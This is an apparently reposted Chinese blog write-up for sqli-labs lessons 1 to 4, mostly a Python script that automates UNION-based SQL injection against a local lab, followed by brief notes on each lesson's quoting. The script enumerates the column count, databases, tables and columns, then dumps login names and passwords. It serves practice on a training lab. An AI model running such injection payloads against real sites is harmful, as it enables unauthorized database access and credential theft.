sqli-labs:1-4,基于报错的注入
Posted sanbuzhi的博客
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs:1-4,基于报错的注入相关的知识,希望对你有一定的参考价值。
sqli1:
脚本
1 # -*- coding: utf-8 -*- 2 """ 3 Created on Sat Mar 23 09:37:14 2019 4 5 @author: kenshin 6 """ 7 8 import requests,re 9 url = \'http://localhost/sqli-labs/Less-1/?id=-1\' 10 11 def Len_OrderBy(url): 12 pattern_mark = \'Unknown column\' 13 #假设字段长20 14 for i in range(1,20): 15 url_new = url + "\\\' order by "+ str(i) +"--+" 16 r = requests.get(url_new) 17 if(re.findall(pattern_mark,r.text)): 18 print(\'the lenght of column(order by) is :\' + str(i-1) + "\\n") 19 break 20 return i-1 21 22 def get_DB(url,lenght): 23 #注意:由此模式匹配到的是一个数量为1的列表,后续按\',\'将数量拆分成n个,以便输出 24 pattern_mark = \'Your Login name:(.+?)<br>\' 25 str = \'\' 26 for i in range(1,lenght): 27 str += \'group_concat(schema_name),\' 28 str += \'group_concat(schema_name)\' 29 payload = \'\\\' union select \' + str +\' from information_schema.schemata--+\' 30 url += payload 31 r = requests.get(url) 32 r = re.findall(pattern_mark,r.text) 33 #list转str 34 str_tmp = "".join(r) 35 #re.split按\',\'拆分 36 lst = re.split(\',\',str_tmp) 37 print(\'-\'*9 + \'databases\' + \'-\'*8) 38 for s in lst: 39 print(\'.\' + s ) 40 print(\'-\'*25) 41 42 def get_TB(url,lenght,db): 43 pattern_mark = \'Your Login name:(.+?)<br>\' 44 str = \'\' 45 for i in range(1,lenght): 46 str += \'group_concat(table_name),\' 47 str += \'group_concat(table_name)\' 48 payload = "\\\' union select "+ str +" from information_schema.tables where table_schema=\\\'" + db + "\\\'--+" 49 url += payload 50 r = requests.get(url) 51 r = re.findall(pattern_mark,r.text) 52 #list转str 53 str_tmp = "".join(r) 54 #re.split按\',\'拆分 55 lst = re.split(\',\',str_tmp) 56 print(\'-\'*9 +\'Database \'+ db +\'\\\'s Tables\' + \'-\'*8) 57 for s in lst: 58 print(\'.\' + s ) 59 print(\'-\'*35) 60 61 def get_Column(url,lenght,tb): 62 pattern_mark = \'Your Login name:(.+?)<br>\' 63 str = \'\' 64 for i in range(1,lenght): 65 str += \'group_concat(column_name),\' 66 str += \'group_concat(column_name)\' 67 payload = "\\\' union select " +str+ " from information_schema.columns where table_name=\\\'" +tb+ "\\\'--+" 68 url += payload 69 r = requests.get(url) 70 r = re.findall(pattern_mark,r.text) 71 #list转str 72 str_tmp = \'\'.join(r) 73 #re.split按\',\'拆分 74 lst = re.split(\',\',str_tmp) 75 print(\'-\'*9 +\'Table \'+ tb +\'\\\'s Columns\' + \'-\'*8) 76 for s in lst: 77 print(\'.\' + s ) 78 print(\'-\'*35) 79 80 def get_data(url,lenght,tb,data): 81 pattern_mark = \'Your Login name:(.+?)<br>\' 82 pattern_mark_pass = \'Your Password:(.+?)</font>\' 83 #if lenght=5 84 #data=a,b,c 85 #after expend 86 #data=a,b,c,4,5 87 #str to list 88 lst = data.split(",") 89 while len(lst) < lenght: 90 lst.append(str(len(lst)+1)) 91 #list to str 92 sn = \'\' 93 for i in lst: 94 sn += i+"," 95 #以上循环结果sn=\'a,b,c,\' c后的‘,’舍去才能构造正确payload 96 sn=sn.rstrip(",") 97 #格式化输出结果 98 print(\'-\'*9 +\'Table \'+ tb +\'\\\'s All datas\' + \'-\'*8) 99 #假设最多有100组数据 100 for i in range(1,100): 101 payload = "\\\' union select "+ sn +" from "+ tb +" where id="+ str(i) +"--+" 102 url_new = url + payload 103 r = r_pass = requests.get(url_new) 104 r = re.findall(pattern_mark,r.text) 105 r_pass = re.findall(pattern_mark_pass,r_pass.text) 106 print(str(r) +" "*(16-len(str(r)))+"=> "+str(r_pass)+" "*(18-len(str(r_pass)))+"|") 107 if (len(r)==0 and len(r_pass)==0): 108 break 109 print("-"*41) 110 111 #字段长度 112 lenght = Len_OrderBy(url) 113 #所有数据库 114 get_DB(url,lenght) 115 #由库爆表 116 db = input("select databases >> ") 117 get_TB(url,lenght,db) 118 #由表爆列 119 tb = input("select table >> ") 120 get_Column(url,3,tb) 121 #由表和列名爆数据 122 data = input("select columns (no more than " +str(lenght)+ ",and separate by \',\') >> ") 123 get_data(url,lenght,tb,data)
sqli2:
与sqli1比较,少了 \',对id没有经过处理。
sqli3:
对id经过了\')处理
sqli4:
对id经过了")处理
以上是关于sqli-labs:1-4,基于报错的注入的主要内容,如果未能解决你的问题,请参考以下文章